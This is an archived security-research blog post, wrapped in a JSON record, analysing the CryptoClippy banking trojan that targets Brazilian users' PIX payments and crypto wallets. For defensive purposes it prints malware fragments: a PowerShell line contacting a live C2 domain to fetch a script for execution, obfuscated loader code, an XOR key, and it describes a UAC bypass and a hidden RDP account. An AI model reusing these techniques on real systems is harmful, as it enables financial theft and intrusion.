{
	"id": "11def925-953a-4785-af7e-27d88970460c",
	"created_at": "2026-04-06T00:06:36.867097Z",
	"updated_at": "2026-04-10T03:21:48.530152Z",
	"deleted_at": null,
	"sha1_hash": "61e3e3d3eb80af12681ed8930612ed46946e53fa",
	"title": "CryptoClippy is Evolving to Pilfer Even More Financial Data",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1582374,
	"plain_text": "CryptoClippy is Evolving to Pilfer Even More Financial Data\r\nBy Nicole Fishbein\r\nPublished: 2023-05-24 · Archived: 2026-04-05 16:19:45 UTC\r\nA banking trojan is malware designed to steal sensitive financial information, such as online banking login\r\ncredentials, credit card numbers, and other financial data. Recently, Unit42 released a detailed report about a new\r\nmalware called CryptoClippy that targets Portuguese speakers. The pesky malware uses the information from the\r\nclipboard to redirect money to crypto-wallets controlled by the threat actors.\r\nIn our research, we have uncovered evidence indicating that the CryptoClippy threat is undergoing rapid\r\nevolution and exceeding its initial scope of crypto wallet theft. Our findings indicate that the threat actors behind\r\nCryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services\r\ncommonly used in Brazil. This discovery highlights the alarming nature of this evolving malware, as it signifies\r\na significant shift in the tactics employed by the malicious actors. As they continue to refine and enhance their\r\nmethods, the potential risks increase for financial data security in Brazil. Our investigation delves deep into these\r\nemerging patterns, shedding light on the evolving landscape of CryptoClippy and the imminent risks it poses to\r\nthe payment ecosystem in Brazil.\r\nDuring our research, we found that the attackers also use NSIS installers to deploy the first stage of the attack.\r\nWe were also able to acquire new malware samples from the C2. While there are many similarities between our\r\nfindings and those described in the reports, we could pick up unique strings and functionalities that were not\r\npresent in the previously reported samples. One of the things that we noticed is that the threat targets services\r\nthat are specifically used in Brazil. 
This starts with the icon of the first-stage installer, which uses the logo of\r\nthe postal service of Brazil, and continues with the malware looking for information associated with PIX – a payment\r\nservice used in Brazil.\r\nIn this blog, we will provide a technical analysis of the artifacts we found.\r\nTechnical Analysis of CryptoClippy\r\nWe identified a suspicious .NET sample that is signed by “PLK Management Limited,”\r\nand its metadata has the company and product name pointing to “WhatsApp.” Still, it doesn’t share code with that\r\nsoftware.\r\nWe named the installer of the first stage MINTYCIV.\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 1 of 13\n\n.NET MINTYCIV first stage installer.\r\nThe installer attempts to look like a legitimate application, but in the background, it attempts to connect to a\r\nremote C2 server. It decodes the URL using Base64, which resolves to https://mydigitalrevival[.]com/get.php and\r\nsends the string “82DPRmbP”. This domain was mentioned in the Unit42 post.\r\nWe found more files with the same signer; however, unlike the first file, they are NSIS installers, like this file.\r\nMost of the files have an icon of Correios. This state-owned company operates the national postal service of\r\nBrazil. The submitted file name starts with Rastreio or Correios followed by four letters. Rastreio translates to\r\n“tracking” in Portuguese and Correios means “mail” or “post office.”\r\nCorreios logo included with the files\r\nOne of the NSIS installers with the Correios logo \r\nAll files have the same behavior – extract and execute a BAT file that attempts to connect to a C2. The connection\r\nwill work only if the request is sent from Brazil. 
However, we overcame this check using a VPN, and thus, we got\r\nthe payload of the 2nd stage.\r\nvoc = 'O2mGSBzKDaVURN6fQpAYxXhn3dqwPy5J7ukbCFoI1svi4tHrWjcZElgLT9M80e' print(\"(\", voc[13],voc[61],voc[27],'-',v\r\nAbove, the BAT script extracted from the NSIS installer.\r\nAfter the deobfuscation of the script, one of the executed commands will upload a string to a malicious remote\r\nserver. If the connection is successful, the remote server will send a PowerShell script that will be immediately\r\nexecuted.\r\n$result = (New-Object System.Net.WebClient).UploadString(\"http://ef0h.com/1/\", \"fXlD\")\r\nAfter executing the BAT file, if the connection is successful, the response is another script that will be executed as\r\nset by the previously executed command. This script collects information about the endpoint – computer name, the\r\noperating system name, display name, architecture, and the name of the antivirus software installed on the\r\nendpoint. \r\nNext, it builds a JSON structure in the following way: \r\nThe key ‘1’ has a unique identifier that changes between samples\r\nThe key ‘2’ stores the value representing the architecture\r\nThe key ‘10’ stores the base64 encoded string that holds the information collected in the\r\nprevious step.\r\n${data}=@{\r\n'1'='3ptt9kcnrgslgt7gfjdojm2qu5'\r\n'2'='64' '10'=[Convert]::\"tObaSe64strING\"([Text.Encoding]::\"DEfAulT\".('GetBytes').Invoke(\"WINMACHINEmike;x64-bas\r\nThe JSON is sent to the same domain used in the previous stage. At this stage it is not clear which values are\r\nexpected by the host. But if the checks are passed, the server will send back a large JSON file processed by the\r\ncurrent script. The data seen above satisfies the checks on the server side, and we obtained the payload for the 2nd\r\nstage of the attack. \r\nThe response contains 5 parts: 3 scripts, a loader, and a configuration file – as described by Unit 42. 
We noticed\r\nthat in the first stage of the attack, a directory was created in AppData\\Roaming, and the directory’s name changed based on the response from the C2. We spotted the names Reposita or Flexizen, which are also the names of 3 of the\r\nscripts used in the first stage of the attack. \r\nOne of the PowerShell scripts (Reposita.ps) decodes the loader of the 2nd stage (the file named sc) and injects it\r\ninto the currently executed process (PowerShell). As in the previous report, the payload is encoded with\r\nXOR, but the key is shorter. After decoding the payload, we got a DLL file. The XOR key used in this execution is\r\n0x1a, 0x13, 0x37, 0xe8, 0xea, 0xb0, 0xb2, 0x94, 0x8b, 0x0b, 0x2d, 0xaa, 0x52, 0xe9, 0xeb, 0x25.\r\nOnce we removed the obfuscation from the PowerShell script, we identified strong similarities to an open-source\r\nproject implementing an injection method. It is possible that the CryptoClippy malware developers cloned the\r\nproject, removed the symbols, added a layer of obfuscation, and deployed this script. \r\nThe script that injects the 2nd loader (after removing the obfuscation from the script)\r\nThe 2nd stage loader is a 64-bit DLL with one exported function – main. The logic of the loader is similar to the\r\none reported by Unit 42, as it also appears to use SysWhisper, an open-source project that implements direct\r\nsystem call execution for evading detection. In addition, both loader versions use Ntdll to resolve API functions,\r\nand the API names are hashed. \r\nAnalysis of the CryptoClippy loader we inspected.\r\nThe loader we found has two unique strings. 
One of them is client-injector64.dll, which seems to be the name of\r\nthe DLL.\r\nWe noticed that both loader versions, before making the injection, call RtlGetVersion to get information about the\r\noperating system of the victim endpoint. The loader checks the OSVERSIONINFOEX.wProductType of the\r\nvictim machine. It will proceed only if the major version is 6 or 10 and the minor version is one of those defined in the\r\ndocumentation.\r\nFrom this check, we understand that the malware targets Windows versions starting from Vista and above.\r\nSource: https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-osversioninfoa\r\nUpdates to the CryptoClippy Malware\r\nThe payload of the loader from the previous stage is the CryptoClippy malware, and the sample that we obtained\r\nshares most of its code with the samples that were published in the previous report. While the main functionality\r\nof the malware stayed the same, there are several changes that we noticed.\r\nAnalysis of the CryptoClippy malware sample obtained from the C2.\r\nInformation Stealing\r\nIn the sample we analyzed, there are 3 functions for processing the clipboard’s content. One of them is responsible\r\nfor switching the address of crypto wallets – as described in the Unit 42 post. One of the other functions takes the\r\nclipboard’s content and sends it to the C2. And the third function checks if the clipboard contains the string\r\n“0014br.gov.bcb.pix”, as seen in the screenshot below. If it’s found, the content is sent to the remote server. PIX is\r\nan online payment platform created by the Central Bank of Brazil. It allows users to make transactions using a\r\nQR code or an equivalent code that contains the string “0014br.gov.bcb.pix”. 
The recipient of the payments\r\ncreates a QR code that must contain the following information: “PIX Key,” “Beneficiary Name,” and “Beneficiary\r\nCity.”\r\n00020126580014br.gov.bcb.pix0136123e4567-e12b-12d1-a456-426655440000 5204000053039865802BR5913Fulano de Tal6008\r\nAbove, PIX copy-and-paste format as mentioned in the document of the Central Bank.\r\nWe found no indications of attempts to introduce a new payload into the clipboard if it detects a PIX string.\r\nInstead, the captured content is promptly sent to the C2 server. Building upon the existing functionality of\r\nCryptoClippy, which involves swapping crypto wallets, we have reason to believe that this method will persist in\r\nfuture iterations.\r\nAdditionally, we anticipate that the forthcoming version will possess an added capability — the ability to\r\nsubstitute the intercepted PIX string with one under the control of the threat actors. This insidious modification\r\nwould effectively redirect all payments to their designated account. \r\nCMSTPLUA CLSID used by the malware in UAC bypass.\r\nBesides the capabilities above, the malware obtains the user name, computer name, Windows version, and\r\nfirmware information (using GetSystemFirmwareTable). It queries the value ‘RSMB’, representing the SMBIOS\r\nfirmware table provider. Then it opens the registry key SOFTWARE\\GbPlugin\\Uni and gets the values of\r\ngFaYEcJ9U3dI and gFaYEcJ9U3RB. The key is created by a plugin called gbplugin whose purpose is to secure\r\nthe connection to internet banking services. It is not clear what sort of information is stored in these registry\r\nentries, but all of the information that was collected in this stage is sent to the C2. 
 \r\nPersistence\r\nAs reported, the malware sets persistence on the victim machine by creating an LNK at\r\nAppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Reposita.lnk.\r\nWe identified a unique way in which the malware creates the LNK file. It calls the CoCreateInstance function,\r\ncreating an object of the class specified by the CLSID value. A CLSID is a unique identifier of a COM class object.\r\nIn our case, the CLSID is {000214EE-0000-0000-C000-000000000046}. Looking up this value, we get only two\r\nresults (the top result is Portuguese):\r\nThis handler points to the IShellLinkA interface, which provides methods for working with Shell links – LNK\r\nfiles. The target of the LNK file is the bat file from the second stage (Reposita.bat). This script is responsible for\r\nexecuting the PowerShell script that injects the loader.\r\nThe malware contains 3 scripts that are executed in different stages of the malware execution. The names of the\r\nscripts change between samples since they depend on the configuration. All of the scripts are encoded using RC4.\r\nAs described by Unit42, one of the files creates a scheduled task for persistence, and a BAT file executes the script\r\n– the 2nd script dropped by the malware. We noticed a unique way the malware executes the bat file with elevated\r\npermissions.\r\nFirst, it queries the token information of the process using GetTokenInformation and checks whether the process\r\nalready has elevated permissions using the TokenElevation class. If so, it will execute the bat file. Otherwise, it will check\r\nthe security policy by checking the registry values under\r\n“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System”. If one of the following values is set:\r\nEnableLUA, ConsentPromptBehaviorAdmin, or ConsentPromptBehaviorUser – the trojan will not execute the\r\nscript at all. 
If none of these values are set, it checks the value of TOKEN_ELEVATION_TYPE to examine the\r\ntoken type. If the value is TokenElevationTypeLimited (numerical value 3), it will use the CMSTPLUA COM\r\n{3E5FC7F9-9A51-4367-9063-A120244FBEC7} interface to bypass UAC and execute the script with elevated\r\npermissions. This technique was previously used by other threats, such as DarkSide ransomware.\r\nCMSTPLUA CLSID used by the malware in UAC bypass.\r\nIf the token elevation type is TokenElevationTypeDefault, the malware will use “runas” to execute the script as an\r\nadministrator. \r\nThe third script we decoded is responsible for enabling and setting up a configuration for the Remote Desktop\r\nService. The script configures the port for the connection; it sets the SecurityLayer to the lowest level,\r\nwhich specifies that the Microsoft Remote Desktop Protocol (RDP) will be used by the server and the client for\r\nauthentication before a remote desktop connection is established; and it sets UserAuthentication to 0, which\r\nspecifies that Network Level Authentication is not required before the remote desktop connection is\r\nestablished. Lastly, using a user name passed as an argument to the script, the script creates a new user account\r\nand appends it to HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList to hide it from winlogon.\r\nThe script also sends information about the endpoint to the C2. The data contains the OS version, computer name,\r\narchitecture, and indicators of whether rdpclip.exe and rfxvmt.dll are present on the endpoint. rdpclip.exe allows\r\nuse of the clipboard during remote desktop sessions, and rfxvmt.dll implements RemoteFX, a collection of graphical\r\nfunctionalities designed to enhance remote connections. 
However, it was deprecated due to many security\r\nvulnerabilities.\r\nIn the sample we inspected, the function that generates folder and mutex names uses the same proprietary\r\nalgorithm, but the format is changed to “%ls%08x,” and the constant passed to the function is 0x973C8F.\r\nNetwork\r\nThe domain name of the C2, as we see in the sample we analyzed, is flowmudy[.]com. The URL that is being sent\r\nis in the format https://flowmudy.com/?act=481c. The value of “act” changes depending on the function that\r\ninitiates the communication. The user agent is stored in the configuration hardcoded into the executable and\r\nencoded with RC4. CryptoClippy uses two different configurations: one is the pf file received from the remote\r\nserver in the first stage of the attack, and the second is hardcoded in the .data section of the malware. The first\r\nconfiguration file contains encoded script names and content, crypto wallet addresses, and the domain name of the\r\nC2 servers. The latter contains the URL format described above and the following user agent.\r\n%s %s HTTP/1.1\r\nHost: %.*s\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Sa\r\nContent-Length: %d\r\nThe decoded user agent, above.\r\nConclusions of CryptoClippy Analysis\r\nIn conclusion, our analysis of CryptoClippy has revealed its rapid evolution, expanding from basic crypto wallet\r\ntheft to reconnaissance gathering and extracting critical payment application and transaction information from\r\nunsuspecting victims in Brazil. Evidence suggests upcoming enhancements that will further expand its\r\ncapabilities. Organizations and individuals must stay abreast of emerging trends and fortify their security defenses\r\nto combat this rapidly evolving menace effectively. 
 \r\nIOCs\r\nDLL loader\r\n894ad71e6fea9a5068512a7de5c2b176bc9556acf96284f131614d0e402059dc\r\n02af8c455fc32e0e79d5b7be2d6349ddc95d747528e328715325947217933dac\r\n.NET loader\r\n19f0f8831ef9d561f6dc395eff55d165d614fa06d13a9a3d39b120ef18242f12\r\nNSIS Installers\r\nCryptoClippy samples\r\nd2c85de7c763e8d8990d06f78f226fda36443253c63678c7c0e998499f3af61a\r\n02af8c455fc32e0e79d5b7be2d6349ddc95d747528e328715325947217933dac\r\nDomains used by the loader\r\nhttp://ef0h[.]com/1/\r\nhttp://4a3d[.]com/1/\r\nhttp://b3do[.]com/1/\r\nhttp://yogarecap[.]com/1/\r\nDomains used by the malware\r\nnicerypx[.]com\r\nflowmudy[.]com\r\nSource: https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/"
	],
	"report_names": [
		"cryptoclippy-evolves-to-pilfer-more-financial-data"
	],
	"threat_actors": [],
	"ts_created_at": 1775433996,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/61e3e3d3eb80af12681ed8930612ed46946e53fa.pdf",
		"text": "https://archive.orkl.eu/61e3e3d3eb80af12681ed8930612ed46946e53fa.txt",
		"img": "https://archive.orkl.eu/61e3e3d3eb80af12681ed8930612ed46946e53fa.jpg"
	}
}